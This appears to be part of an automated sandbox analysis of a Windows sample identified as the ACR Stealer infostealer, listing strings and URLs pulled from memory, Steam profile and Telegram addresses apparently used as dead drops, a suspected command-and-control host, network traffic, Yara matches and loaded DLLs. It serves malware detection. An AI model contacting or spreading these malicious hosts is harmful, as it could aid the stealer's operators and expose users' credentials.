Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/I
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842du
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/6#
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930-
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/badges
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/inventory/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611996199389306
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930=
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930C
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930H
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930V
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930t
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://t.me/asdfghjrrewqqqqtfg
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.0.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.2.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017C03A0_2_0017C03A
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001423C80_2_001423C8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001445390_2_00144539
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0014469F0_2_0014469F
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001428E20_2_001428E2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001669300_2_00166930
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001689600_2_00168960
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017AA6E0_2_0017AA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00144B0C0_2_00144B0C
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00160C700_2_00160C70
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0016AE840_2_0016AE84
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001530A20_2_001530A2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001414240_2_00141424
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001454620_2_00145462
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001537C60_2_001537C6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001538200_2_00153820
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00141A8D0_2_00141A8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0017FC67 appears 91 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0014A85F appears 66 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0015D5B0 appears 52 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0017FC9A appears 73 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.0.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.2.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: classification engineClassification label: mal84.troj.winEXE@2/6@2/2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015AFE8 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_0015AFE8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199619938930[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7504
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1bd116bb-b209-482a-b38b-e01429fca7f2Jump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Users\user\Desktop\OXoeX1Ii3x.exe "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: urlmon.dllJump to behavior
